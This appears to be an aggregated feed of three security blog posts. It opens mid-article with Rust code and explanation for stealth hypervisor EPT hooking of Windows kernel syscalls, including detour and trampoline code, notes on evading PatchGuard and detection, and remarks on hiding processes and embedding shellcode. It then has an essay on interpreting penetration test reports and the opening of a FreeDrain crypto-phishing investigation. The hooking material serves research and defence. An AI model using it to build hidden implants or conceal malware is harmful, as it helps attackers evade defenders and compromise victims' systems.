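    // CPUID is unprivileged, so this runs from a normal user-mode process.
    // The hypervisor intercepts the resulting VM-exit and inspects the leaf/sub-leaf.
    let result = unsafe { __cpuid_count(HYPERCALL_LEAF, CMD_ENABLE_NTCREATEFILE_HOOK) };
    result.eax // hypervisor-defined status value
}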

Command-Line Utility Controlling Kernel Hooks Figure 6: Command-line utility controlling kernel hooks via CPUID hypercalls

The client can enable or disable hooks for specific syscall functions (like NtCreateFile) in real-time. This is especially useful for introspection tools where the hook lifecycle must be externally controlled.

The image below demonstrates a live EPT hook in action. On the left, we see the hypervisor logs tracking the hook process: the 2MB page is first associated with a pre-allocated page table, then split into 512 individual 4KB entries. A shadow page is pulled from a pre-allocated pool and mapped to the target guest page. The guest’s original 4KB memory is cloned into the shadow page, a VMCALL inline hook is inserted, and execute permissions are revoked on the original page. This detour is used to trigger a VM-exit when the function executes. On the right, WinDbg confirms that the shadow-mapped address (0xab0c360) correctly contains the VMCALL opcode (0f01c1), and that the original NtCreateFile at 0xfffff8005de16360 remains untouched.

This keeps the hook invisible at the virtual memory level: the original GVA still resolves to the same GPA, but the hypervisor rewires the final mapping to the HPA of the shadow page. From the guest’s typical perspective (unless inspecting physical memory), the memory appears unmodified - yet the hook is live.

Debug Logs and WinDbg Output Demonstrating Stealth EPT Hook Execution Figure 7: Debug logs and WinDbg output demonstrating stealth EPT hook execution

Matrix: Windows Kernel Driver-Based Hypervisor Using Dual EPT

Matrix is a Windows kernel driver-based hypervisor built for runtime introspection and syscall redirection. It was developed before illusion-rs, but explores a different approach: instead of running from firmware, Matrix installs as a Windows driver and operates from kernel mode, leveraging two Extended Page Table (EPT) contexts - one for the original memory and another for shadowed pages that contain hook logic.

Unlike Illusion, which sets up a single EPT and uses MTF-based control at boot, Matrix uses dual EPTs to trap execution dynamically. This allows us to configure execute-only hooks, remap guest pages without modifying them, and control function redirection at runtime. Our implementation toggles between the two EPTs - the primary EPT for normal guest execution, and the secondary EPT for redirected flows - using dynamic EPTP switching triggered by VM-exits. Some hypervisors extend this design by using two, three, or more EPTs - for example, maintaining separate EPTs for different execution stages or process contexts. Some implementations also opt for per-logical-processor EPT isolation. In contrast, matrix uses a minimal dual-EPT setup shared across all logical processors, focusing on simplicity and testability to demonstrate the core concept.

The diagram below shows how this works in Matrix: original pages lose execute permissions in the primary EPT, and are mirrored in the secondary EPT with EXECUTE-only rights, pointing to trampoline logic in a shadow copy. Runtime execution of the target function triggers a VM-exit, which we use to switch contexts and reroute control to the hook handler.

EPT Hooking Flow Diagram - Matrix Hypervisor Figure 8: Control flow of dual-EPT based function hooking in the Matrix Windows kernel driver-based hypervisor

Each step shown in the diagram is explained in detail in the sections below.

Initializing Primary and Secondary EPTs (virtualize_system())

When our kernel-mode driver is loaded, we initialize virtualization by allocating and identity-mapping (1:1) two separate EPT contexts: one primary and one secondary. Both are initially set up with full READ_WRITE_EXECUTE permissions to mirror guest memory. The primary EPT provides a clean view of guest memory without interference, while the secondary EPT is where we apply shadowed pages for hooks. This dual mapping allows us to selectively redirect execution without touching the original memory, switching between EPTs as needed to trap and analyze function calls.

Code Reference (lib.rs)

primary_ept.identity_2mb(AccessType::READ_WRITE_EXECUTE)?;
secondary_ept.identity_2mb(AccessType::READ_WRITE_EXECUTE)?;

Step 1 and 2 - Creating Shadow Hooks and Setting Up Trampolines (hook_function_ptr())

Before enabling virtualization, we prepare our hooks by resolving target functions and setting up detours. We hook two kernel functions: MmIsAddressValid, resolved from the export table, and NtCreateFile, resolved from the SSDT by syscall number. For each, we create a trampoline to preserve the original prologue and allow clean return after our hook logic executes.

To do this, we copy the page containing the target function into a shadow region, calculate the function’s location within the copied page, and insert an inline INT3 breakpoint to trigger VM-exits. These hooks are added to our internal hook manager and remain dormant until the dual-EPT remapping is configured. While illusion-rs could have used the same approach, it instead uses VMCALL - partly to avoid breakpoint exceptions and partly just to try something different from what was already done in matrix-rs.

let mm_is_address_valid =
    Hook::hook_function("MmIsAddressValid", hook::mm_is_address_valid as *const ())
        .ok_or(HypervisorError::HookError)?;

if let HookType::Function { ref inline_hook } = mm_is_address_valid.hook_type {
    hook::MM_IS_ADDRESS_VALID_ORIGINAL
        .store(inline_hook.trampoline_address(), Ordering::Relaxed);
}

let ssdt_nt_create_file_addy = SsdtHook::find_ssdt_function_address(0x0055, false)?;

let nt_create_file_syscall_hook = Hook::hook_function_ptr(
    ssdt_nt_create_file_addy.function_address as _,
    hook::nt_create_file as *const (),
)
.ok_or(HypervisorError::HookError)?;

if let HookType::Function { ref inline_hook } = nt_create_file_syscall_hook.hook_type {
    hook::NT_CREATE_FILE_ORIGINAL.store(inline_hook.trampoline_address(), Ordering::Relaxed);
}

let hook_manager = HookManager::new(vec![mm_is_address_valid, nt_create_file_syscall_hook]);

We support hook creation using either a function name (hook_function) or a raw pointer (hook_function_ptr). The name-based method resolves a function from the kernel export table, while the pointer-based method is used for syscalls or undocumented routines where we locate the address via the SSDT. Internally, hook_function_ptr clones the 4KB page containing the target function into a shadow region, calculates the function’s offset within that page, and injects an inline INT3 (0xCC) breakpoint to trigger a VM-exit. To safely return to the original logic, FunctionHook::new builds a trampoline - a small stub that restores the overwritten bytes and performs a RIP-relative indirect jump (jmp qword ptr [rip+0]) back to the remainder of the original function. This ensures control flow resumes cleanly after our handler executes, without modifying guest memory.

Code Reference (hooks.rs)

let original_pa = PhysicalAddress::from_va(function_ptr);
let page = Self::copy_page(function_ptr)?;

let page_va = page.as_ptr() as *mut u64 as u64;
let page_pa = PhysicalAddress::from_va(page_va);

let hook_va = Self::address_in_page(page_va, function_ptr);
let hook_pa = PhysicalAddress::from_va(hook_va);

let inline_hook = FunctionHook::new(function_ptr, hook_va, handler)?;
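To make the trampoline layout concrete, the sketch below shows the general construction described above: the displaced prologue bytes are replayed, followed by FF 25 00000000 (jmp qword ptr [rip+0]) whose 8-byte inline target is the first untouched instruction of the original function. This illustrates the layout only and is not the project's FunctionHook::new.

/// Illustrative only. `trampoline` must point to writable, executable memory
/// large enough for the stolen bytes plus a 14-byte absolute jump stub.
unsafe fn build_trampoline(trampoline: *mut u8, stolen_bytes: &[u8], resume_at: u64) {
    // 1. Replay the instructions displaced by the INT3/VMCALL detour.
    core::ptr::copy_nonoverlapping(stolen_bytes.as_ptr(), trampoline, stolen_bytes.len());

    // 2. FF 25 00000000 = jmp qword ptr [rip+0]; the absolute target follows inline.
    const JMP_RIP_REL: [u8; 6] = [0xFF, 0x25, 0x00, 0x00, 0x00, 0x00];
    let jmp_at = trampoline.add(stolen_bytes.len());
    core::ptr::copy_nonoverlapping(JMP_RIP_REL.as_ptr(), jmp_at, JMP_RIP_REL.len());

    // 3. Absolute address of the first untouched instruction in the original function.
    let target = resume_at.to_le_bytes();
    core::ptr::copy_nonoverlapping(target.as_ptr(), jmp_at.add(JMP_RIP_REL.len()), target.len());
}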

Step 3, 4, 5 and 6 - Dual-EPT Remapping for Shadow Execution (enable_hooks())

Code Reference (hooks.rs)

After preparing our hooks, we configure the dual-EPT mappings to support shadow execution. For each hooked address, we split the containing 2MB page into 4KB entries in both EPTs. In the primary EPT, we mark the page as READ_WRITE, explicitly removing execute permissions. In the secondary EPT, we mark the same page as EXECUTE only and remap it to our shadow copy containing the inline hook and trampoline logic. This dual-view setup ensures that read and write accesses go through the original mapping in the primary EPT, while instruction fetches trigger execution from our detoured shadow page once we switch to the secondary EPT during an EPT violation later on.

primary_ept.split_2mb_to_4kb(original_page, AccessType::READ_WRITE_EXECUTE)?;
secondary_ept.split_2mb_to_4kb(original_page, AccessType::READ_WRITE_EXECUTE)?;

primary_ept.change_page_flags(original_page, AccessType::READ_WRITE)?;
secondary_ept.change_page_flags(original_page, AccessType::EXECUTE)?;

secondary_ept.remap_page(original_page, hooked_copy_page, AccessType::EXECUTE)?;

Step 7 - Configuring VMCS for Breakpoint VM-Exits (setup_vmcs_control_fields())

During VMCS setup, we configure the EXCEPTION_BITMAP to trap INT3 instructions, ensuring that breakpoint exceptions trigger a VM-exit. Execution starts with the primary_eptp loaded, providing the initial read/write view of guest memory.

Code Reference (vmcs.rs)

vmwrite(vmcs::control::EXCEPTION_BITMAP, 1u64 << (ExceptionInterrupt::Breakpoint as u32));
vmwrite(vmcs::control::EPTP_FULL, shared_data.primary_eptp);

Step 8 - Handling EPT Violations with Dynamic EPTP Switching (handle_ept_violation())

When the guest attempts to execute a page that has been marked non-executable in the primary EPT, we receive a VM-exit due to an EPT violation. In response, we switch to the secondary EPTP, which remaps the same GPA to an EXECUTE-only shadow page containing our detour. This allows the guest to continue executing from the hooked version of the function.

Code Reference (ept.rs)

let guest_physical_address = vmread(vmcs::ro::GUEST_PHYSICAL_ADDR_FULL);
let exit_qualification_value = vmread(vmcs::ro::EXIT_QUALIFICATION);
let ept_violation_qualification = EptViolationExitQualification::from_exit_qualification(exit_qualification_value);

if ept_violation_qualification.readable && ept_violation_qualification.writable && !ept_violation_qualification.executable {
    let secondary_eptp = unsafe { vmx.shared_data.as_mut().secondary_eptp };
    vmwrite(vmcs::control::EPTP_FULL, secondary_eptp);
}

If the guest later accesses the same page with a read or write operation - which is not permitted in the secondary EPT - we detect the violation and switch back to the primary EPTP, restoring full READ_WRITE access for data operations.

if !ept_violation_qualification.readable && !ept_violation_qualification.writable && ept_violation_qualification.executable {
    let primary_eptp = unsafe { vmx.shared_data.as_mut().primary_eptp };
    vmwrite(vmcs::control::EPTP_FULL, primary_eptp);
}

Matrix doesn’t currently handle mixed access patterns like RWX or RX within the same page, unlike Illusion, which uses MTF to safely replay displaced instructions.

Step 9 - Redirecting Execution via Breakpoint Handlers (handle_breakpoint_exception())

When the guest executes the INT3 instruction embedded in the shadow page, a VM-exit is triggered due to the breakpoint exception. We resolve the guest’s current RIP and check if it matches any registered hook in our internal manager. If found, we redirect RIP to our hook handler, placing us in full control of execution. From here, we can inspect arguments, log activity, or introspect guest memory before returning to the original function using the preserved trampoline.

Code Reference (exceptions.rs)

if let Some(Some(handler)) = hook_manager.find_hook_by_address(guest_registers.rip).map(|hook| hook.handler_address()) {
    guest_registers.rip = handler;
    vmwrite(vmcs::guest::RIP, guest_registers.rip);
}

Step 10 - Returning via Trampoline to Original Guest Function (mm_is_address_valid() and nt_create_file())

After our hook logic runs, we forward execution back to the original kernel function using a trampoline. The handler retrieves the preserved entry point from an atomic global and safely casts it to the correct signature. This handoff ensures the guest continues as if uninterrupted, maintaining guest illusion.

Code Reference (hook.rs)

// MmIsAddressValid: load the preserved entry point (trampoline) and call the original.
let fn_ptr = MM_IS_ADDRESS_VALID_ORIGINAL.load(Ordering::Relaxed);
let fn_ptr = unsafe { mem::transmute::<_, MmIsAddressValidType>(fn_ptr) };
fn_ptr(virtual_address as _)

// NtCreateFile: same pattern with its own preserved pointer and signature.
let fn_ptr = NT_CREATE_FILE_ORIGINAL.load(Ordering::Relaxed);
let fn_ptr = unsafe { mem::transmute::<_, NtCreateFileType>(fn_ptr) };
fn_ptr(...)
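
For completeness, here is a sketch of how the preserved entry point might be published at hook-install time; the atomic’s exact type and name are assumptions for illustration:

use core::sync::atomic::{AtomicU64, Ordering};

// Assumed to be an AtomicU64 holding the trampoline's virtual address.
static MM_IS_ADDRESS_VALID_ORIGINAL: AtomicU64 = AtomicU64::new(0);

fn preserve_original_entry(trampoline_va: u64) {
    // The breakpoint handler later loads this value and transmutes it back
    // to the original function's signature before calling it.
    MM_IS_ADDRESS_VALID_ORIGINAL.store(trampoline_va, Ordering::Relaxed);
}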

Matrix Execution Trace: Proof-of-Concept Walkthrough

This screenshot captures a live EPT violation triggered when the guest executes MmIsAddressValid. The debug output (left) shows that an EXECUTE access on the original guest physical page at 0xfffff801695ad370 caused a VM-exit, as it had been stripped of execute permissions in the primary EPT. We respond by switching to the secondary EPT, where the guest physical address is remapped to a shadow copy located at 0x239d38370.

In the shadow page, we overwrite the function prologue with a single-byte INT3 instruction, causing a breakpoint exception. This results in another VM-exit, where we locate the hook, redirect guest RIP to the handler, and resume execution. After the handler completes, execution is transferred to a trampoline located at 0xffffdb0620809f90, which continues the original function. The trampoline performs this redirection via an indirect jmp qword ptr [0xffffdb0620809f9a], which reads its target - the address immediately after the overwritten instruction in the original function - and restores execution flow.

Figure 9: Shadow Page Redirection and Trampoline Setup for MmIsAddressValid

The debug logs confirm that the MmIsAddressValid hook handler was successfully invoked, and its first parameter was printed, demonstrating that the redirection and handler execution worked as intended.

Figure 10: EPT Violation Handling and Hook Invocation for MmIsAddressValid

Unlike Illusion, we don’t currently support user-mode communication in Matrix, though adding it would be straightforward. What we demonstrate instead is a complete proof-of-concept for redirecting kernel execution using EPTP swaps, instruction trapping, and memory virtualization - all without modifying guest memory. This enables stealth introspection, syscall monitoring, and control flow redirection from a kernel driver-based hypervisor on Windows. While not hardened for real-world deployment, Matrix lays the foundation for advancing EPT-based evasion techniques, dynamic analysis, and memory protection research.

Hook Redirection Techniques: INT3, VMCALL, and JMP

While the use of INT3-based hooks offers a lightweight and minimally invasive method for redirecting control flow, it introduces two VM-exits per hook invocation: one on the EPT violation and another on the breakpoint exception. Illusion shares this tradeoff, using VMCALL instead of INT3 but likewise incurring an extra VM-exit during hook execution. An alternative is to use a 14-byte indirect jump, such as jmp qword ptr [rip+0], which performs an absolute jump by reading the target address from memory immediately following the instruction. This avoids the breakpoint entirely and reduces VM-exits to just one - from the EPT violation alone.

Matrix supports this form of JMP hook via a jmp [rip+0] stub, followed by an 8-byte target address. This method avoids clobbering registers (unlike the mov rax, addr; jmp rax sequence) and reduces the likelihood of introducing side effects. The implementation avoids using general-purpose registers by embedding the jump target inline, which simplifies redirection logic and maintains guest register integrity. By default, Matrix uses INT3 hooks for simplicity and reduced shellcode size.
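
As a rough illustration, the 14-byte stub breaks down into 6 opcode bytes plus an 8-byte absolute target; a minimal sketch (assumed helper, not the project’s exact code) of writing it into the shadow copy:

// jmp qword ptr [rip+0] encodes as FF 25 00 00 00 00, followed by the 8-byte
// absolute target that the jump reads from memory immediately after the instruction.
fn write_jmp_stub(stub: &mut [u8; 14], target: u64) {
    stub[..6].copy_from_slice(&[0xFF, 0x25, 0x00, 0x00, 0x00, 0x00]);
    stub[6..].copy_from_slice(&target.to_le_bytes());
}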

However, the larger shellcode required for either JMP approach means overwriting more of the original function prologue, increasing complexity around instruction alignment and relative addressing. Other instructions like CPUID, VMCALL, or even undefined opcodes can also be used to trap into the hypervisor, offering future directions for configurable or hybrid hook techniques in Matrix or Illusion.

Hypervisor Detection Vectors

While this article focuses on EPT-based function redirection and stealth memory manipulation for memory introspection, it’s important to acknowledge that hypervisor-assisted hooks can be detected from usermode, even without elevated privileges. These detection techniques typically rely on timing discrepancies, fault-triggering behavior, or instruction-level profiling - usually caused by VM exits during memory access or privileged instruction handling.

Although out-of-scope for this post, here’s a non-exhaustive list of some known detection methods:

  • Write-checks to unused code padding (e.g., 0xCC -> 0xC3)
  • RDTSC-based timing checks to detect EPT page swaps
  • Thread-based timing discrepancies across CPU cores
  • CPUID execution profiling (e.g., latency measurement and vendor ID leaks)
  • Instruction Execution Time (IET) divergence using APERF or similar counters
  • Fault injection via invalid XSETBV, MSR, or control register (CR) access
  • Synthetic MSR probing (e.g., reads to the 0x40000000 range)
  • SIDT/SGDT descriptor length checks in WoW64 mode
  • LBR stack mismatches during forced VM exits
  • INVD/WBINVD misuse to test caching consistency
  • VMCALL exception handling behavior (e.g., improper #GP injection)
  • CR0/CR4 shadow mismatch or VMXE bit exposure
  • Unusual exception/NMI delivery paths (e.g., unexpected #PF or #UD behavior)
  • UEFI memory map analysis to reveal hidden hypervisor regions
  • CR3 trashing to disrupt hypervisors that track or isolate memory mappings per process
  • Descriptor table (GDT/IDT) integrity checks to detect hypervisors that fail to isolate or emulate guest-accessible structures correctly
  • Page table consistency checks targeting hypervisors that do not fully separate guest and host memory contexts (e.g., shared CR3 or improper shadow paging)
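
As one concrete example of the timing-based checks above, a user-mode CPUID latency probe takes only a few lines; the threshold below is an assumption and would need tuning per environment:

#[cfg(target_arch = "x86_64")]
fn cpuid_looks_virtualized() -> bool {
    use std::arch::x86_64::{__cpuid, _rdtsc};

    const SAMPLES: u64 = 1_000;
    let mut total = 0u64;

    for _ in 0..SAMPLES {
        unsafe {
            let start = _rdtsc();
            let _ = __cpuid(0); // unconditionally causes a VM-exit under VT-x
            total += _rdtsc() - start;
        }
    }

    // Bare metal typically costs a few hundred cycles; a VM-exit round trip
    // usually pushes the average well past this assumed threshold.
    (total / SAMPLES) > 1_000
}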

Detailed explorations of these techniques (and many others) exist in prior public research; while some of those resources are older, many of the underlying concepts remain valid. The broader topics of evasion, stealth, and hypervisor detection are left as an exercise for the reader.

Appendix

Guest-Assisted Hooking Model

During early development of illusion-rs, a guest-assisted hooking model was implemented and tested. This technique involved allocating memory in the guest, injecting helper code, and redirecting execution (RIP) to a payload from the hypervisor. While technically viable, it introduced additional complexity and detection risk.

Traditional JMP-based inline hooks were avoided because the hypervisor operates outside the guest’s address space in a UEFI context. Implementing them would have required modifying guest memory, resolving APIs manually, coordinating execution context, and managing synchronization across early kernel stages - all of which added exposure and fragility.

This model was similar to the approach explored by Satoshi Tanda, who implemented a GuestAgent in C to hijack control from within the guest during kernel initialization and perform in-guest syscall hooking.

Although functional, this technique complicated recovery and required delicate coordination with guest state. Ultimately, it was removed from illusion-rs in favor of a cleaner design: EPT shadowing combined with inline VMCALL detours and MTF single-stepping for restoration. This approach avoids modifying guest memory entirely by redirecting execution through hypervisor-controlled shadow pages, simplifying control flow and enabling precise redirection without in-guest code.

Comparing EPT Hooking Models: Per-Core vs Shared

The two hypervisors presented in this article - illusion-rs and matrix-rs - implement different EPT-based hooking models, each chosen to explore trade-offs in design, implementation complexity, and control granularity.

Use illusion-rs if you need precise control and fully host-side introspection without relying on in-guest code or memory allocation. It’s also ideal for scenarios requiring early boot-time visibility - such as monitoring or hijacking kernel behavior - before any drivers or security controls are initialized.

Use matrix-rs if you prefer a dynamically loadable Windows kernel driver-based hypervisor with a shared EPT model and no reliance on UEFI or firmware-level integration.

Matrix (Shared EPT Across All Logical Processors)

matrix-rs is a Windows kernel driver-based hypervisor that uses a single EPT shared across all logical processors. This design was inspired by not-matthias’s AMD hypervisor, and development began in late 2022 as a learning project. The shared EPT model made implementation simpler - EPT violations can trigger EPTP switching, and hook state is globally consistent.

Pros:

  • Fewer EPT contexts to manage (single EPTP per system)
  • Simpler hook setup - updates apply globally
  • Only one INVEPT needed per hook change (such as adding or removing a hook)

Cons:

  • Race conditions can occur across processors
  • Harder to manage per-core or dynamic hook states
  • Less precise control over per-CPU redirection

Both models require EPT cache invalidation during hook changes (such as adding or removing a hook), and INVEPT must be issued on each logical processor because TLBs are per-logical-processor. This applies whether the hypervisor uses per-core EPTs like illusion-rs or a shared EPT like matrix-rs.

Illusion (Per-Logical-Processor EPTs with MTF)

illusion-rs is a UEFI-based hypervisor that uses a separate EPT for each logical processor. Development began in late 2023 to explore a boot-time introspection model using Monitor Trap Flag (MTF) stepping for displaced instruction replay. This approach avoids allocating memory or injecting trampoline code into the guest entirely - everything remains under hypervisor control.

Pros:

  • Hook logic remains fully on the host - no in-guest code needed
  • Enables clean replay of overwritten instructions via MTF
  • Fine-grained redirection per logical processor

Cons:

  • Hook updates must be replicated to all EPT contexts
  • Requires issuing INVEPT on each logical processor on every hook change (such as adding or removing a hook)
  • Increased complexity from maintaining consistent hook state across processors
  • MTF stepping incurs additional VM-exits per instruction replay, which may introduce performance overhead depending on the number of overwritten instructions, hook frequency, and placement

Unlike traditional hook models that resume immediately after a detour, the MTF-based approach introduces one VM-exit per replayed instruction. This may be negligible for single hooks but becomes measurable if hooking frequently-executed code paths or system-wide targets.
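
For reference, MTF is simply a bit (bit 27) in the primary processor-based VM-execution controls that is toggled around each replayed instruction; a sketch using assumed field and helper names that mirror the earlier snippets:

// Field name assumed to follow the same vmcs::control convention used above.
const MONITOR_TRAP_FLAG: u64 = 1 << 27;

fn set_monitor_trap_flag(enable: bool) {
    let mut controls = vmread(vmcs::control::PRIMARY_PROCBASED_EXEC_CONTROLS);
    if enable {
        controls |= MONITOR_TRAP_FLAG;
    } else {
        controls &= !MONITOR_TRAP_FLAG;
    }
    vmwrite(vmcs::control::PRIMARY_PROCBASED_EXEC_CONTROLS, controls);
}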

There are many additional trade-offs - such as design constraints, integration complexity, and guest compatibility - that are beyond the scope of this article and left as an exercise for the reader.

While illusion-rs introduces a cleaner memory manager with pre-allocated page tables and shadow pages, both hypervisors remain proof-of-concept designs. Each offers a foundation for low-level memory introspection and control flow redirection, and can serve as a starting point for deeper research or production-quality development.

For most dynamic or runtime hooking scenarios, the shared EPT model in matrix-rs may be easier to integrate. For firmware-level introspection and early boot control, illusion-rs offers tighter control over execution at the cost of added complexity.

Conclusion

This post covered how to build Rust-based hypervisors for stealth kernel introspection and function hooking using Extended Page Tables (EPT). We explored two proof-of-concept implementations: illusion-rs, a UEFI-based hypervisor that hooks syscalls during early boot, and matrix-rs, a Windows kernel driver-based hypervisor that uses dual-EPT context switching to redirect execution at runtime.

We demonstrated how to detect when the SSDT is fully initialized inside ntoskrnl.exe, how to install execute-only shadow pages, and how to safely redirect execution using VMCALL, CPUID, or INT3 without modifying guest memory. In Illusion, we relied on Monitor Trap Flag (MTF) single-stepping to replay displaced instructions, while Matrix used breakpoint exceptions and trampoline logic to forward control.

Both approaches preserve guest memory integrity and operate without triggering PatchGuard by relying on EPT-backed remapping instead of patching the kernel directly. The result is syscall hooking with fine-grained execution control, suitable for implants, introspection, or security research.

The examples shown here are not groundbreaking - they’re simply a reproducible starting point. Once control is established, these techniques can be extended to conceal threads, processes, handles, memory regions, or embed payloads like shellcode or reflective DLLs - all without modifying guest memory. However, Virtualization-Based Security (VBS) makes custom hypervisor-based hooking significantly harder - from preventing third-party hypervisors from loading at all, to disrupting EPT-based redirection techniques. Defenses like Intel VT-rp, nested virtualization barriers, and integrity enforcement make it difficult to establish control below or alongside Hyper-V - unless you’re prepared to pivot into hyperjacking Hyper-V at boot-time or run your own hypervisor on top of Hyper-V via nested virtualization. Still, building your own hypervisor offers greater control, flexibility, and understanding - and it’s often where the truly novel work begins.

Everything demonstrated was implemented using publicly documented techniques - no NDAs, no private SDKs, and no reliance on undocumented internals. These techniques have long been used in the game hacking scene and are increasingly adopted in security research and commercial products. However, practical guides and open-source implementations remain relatively uncommon, especially for early boot-time hypervisors.

Both illusion-rs and matrix-rs are open-source and available for experimentation. For those looking to explore more minimal or educational examples, barevisor by Satoshi Tanda provides a clean starting point for hypervisor development across Intel and AMD platforms - for both Windows kernel driver-based and UEFI-based hypervisors.

However, if you’re looking for a pre-built, modular, and extensible library for Virtual Machine Introspection, check out the recent project vmi-rs by Petr Beneš (@wbenny).

Misinterpreted: What Penetration Test Reports Actually Mean

“I can’t show this to my customers! I need a clean report!”

At Include Security, we put a lot of care into our penetration test reports. But over the years, we’ve noticed that our reports are sometimes interpreted in ways we did not intend. This is understandable. Different people, with different backgrounds, goals, and incentives, will naturally read the same document differently. That is the nature of communication. Still, we think it is worth clarifying some of our intentions and addressing some common misinterpretations. In this post, we’ll walk through the most common misconceptions we encounter and explain our perspectives as an expert pentesting team.

Who Our Reports Are For

As we acknowledged above, interpretations of a report will depend on the reader. When we deliver a report, we have four primary audiences in mind:

Our client. First and foremost, we are hired to help improve the security of a client’s technology. The report documents what we tested, what we found, and what we understand about the security posture of the system. The goal is to help our client make informed decisions about the security of their systems and applications.

Our client’s customers. Many organizations purchasing products and services require evidence of third-party security assessments from their vendors. We take that responsibility of independent review seriously. When a customer reviews one of our reports, we want them to know that it was written with integrity and technical rigor.

Auditors. Although we are not ourselves auditors, our penetration test reports are often used during compliance reviews or audits to demonstrate that testing has been performed. In these cases, our reports must clearly describe the scope, methodology, findings, and remediation status. Auditors must determine from this content whether compliance requirements have been met.

Ourselves. Many clients conduct periodic assessments of the same systems. While we take extensive internal notes, past reports are a key input to future assessments. They serve as part of our institutional memory, so they need to be thorough, accurate, and clear.

Reflecting on many report readout meetings and post-delivery conversations with our clients, we’ve identified the three misinterpretations that require the most additional communication to reach alignment.

Misinterpretation #1: Vulnerabilities are a sign of failure

On many occasions, we’ve received alarmed responses from clients about findings in the report. The clients expressed a concern like “I need to show this report to my customers, and if they see we have any vulnerabilities, they won’t want to do business with us.” We completely understand why a customer would want to avoid purchasing software with a poor record of security. However, the information in the report needs to be considered in the proper context. It is a snapshot in time. Vulnerabilities may have been recently added to the test environment during the latest feature development, and they may be resolved before being exposed to the world. 

We have tested code from startups as well as established tech giants. We’ve examined code built with a wide range of programming languages and frameworks. Nobody is writing code that does anything interesting without occasionally introducing some security vulnerabilities. 

The presence of vulnerabilities in a penetration test report does not necessarily represent any deficiency of the developers nor their software development process. Just as great writers benefit from editors, great engineers benefit from outside testers. A report with findings does not mean the team failed. It means security experts looked closely and found areas that could be improved. 

By the time you’re reading this, this blog post will have been through several revisions and incorporated feedback from multiple readers/editors. It is considerably less complex than most software projects, and yet it still didn’t get everything right in the initial draft (and probably still didn’t in this published version either!).

Misinterpretation #2: A “clean” report is always good news

Some application tests result in a report with few or no vulnerabilities identified because the applications have been hardened over time and the core code has been subjected to repeated testing. With limited code changes between tests, the number and severity of vulnerabilities declines. This is great.

However, many application tests reveal few findings for less comforting reasons:

  • The scope was very narrow. The whole system might have interesting functionality and potential risks, but the boundaries of the test did not permit all of it to be examined.
  • The time allotted was insufficient for complete coverage. Perhaps the budget only provided one week’s worth of testing for a very large application. Some testing is better than no testing, but without enough time to cover everything, assurance is reduced.
  • There were limitations in the test environment, such as: features weren’t fully functional, test data was absent, request rate limiting was enforced, databases were refreshed during testing, new code was deployed during testing, or test accounts weren’t available for all roles.
  • Only dynamic testing was performed (i.e., black-box testing); source code was not provided.
  • The skills of the assessment team were lacking. IncludeSec has an all-expert team, but that’s not true everywhere.

Misinterpretation #3: It is necessary for every finding to be fixed.

A finding in the report is not a demand for remediation. Penetration testing identifies technical risks. Whether or not to remediate those risks is a business decision. Penetration testers do not know the client’s budget, roadmap, risk tolerance, or the business value of each application or function. It is completely reasonable for a business to accept some risks and elect to not remediate certain vulnerabilities. That decision does not invalidate the finding, and it does not mean the finding is a false positive. It simply reflects that the cost to fix a vulnerability can be greater than the business benefit of remediation. In this case, we encourage our clients to document their reasoning for risk acceptance. We include their explanation in our remediation report so that interested parties can understand the full context.

What Is Better Than a “Clean” Report?

We understand the appeal of a report with no findings. It feels like a win. But we believe there are better indicators of a strong security posture:

Regular testing. One report is just a snapshot. Security is an ongoing process. Integrate secure development practices, code reviews, and internal QA into your software development lifecycle. Bring in third-party testers regularly to catch what might be missed internally.

Good remediation reports. The contents of the initial report are only half the story. Confirmation that the identified vulnerabilities have been fixed is evidence that a client’s assurance process is achieving its aim of improving the application’s security.

Reports without caveats. A zero-finding report from a short, constrained, black-box test tells you less than a thorough test that uncovered real vulnerabilities and explained them clearly.

Reports from skilled, reputable testers. Testing is only as good as the people doing it. A short report might reflect a secure system, or it might reflect weak testing. A strong report demonstrates expertise by explaining how the system works and why certain classes of vulnerabilities were or were not present.

Final Thoughts

Penetration test reports are tools for improving security. When read in the right context, even reports full of findings can be signs of a mature, proactive development culture. The goal isn’t a perfect report; it’s a stronger, more resilient system.

The post Misinterpreted: What Penetration Test Reports Actually Mean appeared first on Include Security Research Blog.

FreeDrain Unmasked | Uncovering an Industrial-Scale Crypto Theft Network

Executive Summary

  • FreeDrain is an industrial-scale, global cryptocurrency phishing operation that has been stealing digital assets for years.
  • FreeDrain uses SEO manipulation, free-tier web services (like gitbook.io, webflow.io, and github.io), and layered redirection techniques to target cryptocurrency wallets.
  • Victims search for wallet-related queries, click on high-ranking malicious results, land on lure pages, and are redirected to phishing pages that steal their seed phrases.
  • SentinelLABS and Validin researchers identified over 38,000 distinct FreeDrain subdomains hosting lure pages.
  • Phishing pages are hosted on cloud infrastructure like Amazon S3 and Azure Web Apps, mimicking legitimate cryptocurrency wallet interfaces.
  • Evidence suggests the operators are based in the UTC+05:30 timezone (Indian Standard Time) and work standard weekday hours.
  • FreeDrain represents a modern, scalable phishing operation that exploits weaknesses in free publishing platforms and requires better platform-level defenses, user education, and security community collaboration.

Unveiled today at PIVOTcon, this joint research from Validin, the global internet intelligence platform, and SentinelLABS, the threat intelligence and research team of SentinelOne, exposes the FreeDrain Network: a sprawling, industrial-scale cryptocurrency phishing operation that has quietly siphoned digital assets for years. What began as an investigation into a single phishing page quickly uncovered a vast, coordinated campaign weaponizing search engine optimization, free-tier web services, and layered redirection techniques to systematically target and drain cryptocurrency wallets at scale.

In this collaborative blog, we detail the technical anatomy of the FreeDrain operation from the discovery process and infrastructure mapping to evasion techniques and the end-to-end workflow attackers use to funnel victims through multilayered financial theft paths. We also walk through the custom tooling we built to hunt, track, and monitor this large campaign in real time.

Our findings highlight the growing sophistication of financially motivated threat actors and the systemic risks posed by under-moderated publishing platforms. This research underscores the need for adaptive detection, proactive monitoring, and tighter safeguards across the ecosystem to disrupt threats like FreeDrain before they scale.

The Plea for Help

Our investigation into what would become the FreeDrain Network began on May 12, 2024, when Validin received a message from a distressed individual who had lost approximately 8 BTC, worth around $500,000 at the time. The victim had unknowingly submitted their wallet seed phrase to a phishing site while attempting to check their wallet balance, after clicking on a highly-ranked search engine result.

Request for help after successful phish

The individual had come across a Validin blog post from April 2024, which documented a series of crypto-draining phishing pages. The phishing site they encountered shared striking similarities to the infrastructure we had analyzed—specifically, pages hosted on azurewebsites[.]net, along with additional dedicated domain names.

Trusted cryptocurrency tracking analysts confirmed that the destination wallet used to receive the victim’s funds was a one-time-use address. The stolen assets were quickly moved through a cryptocurrency mixer, an obfuscation method that fragments and launders funds across multiple transactions, making attribution and recovery nearly impossible.

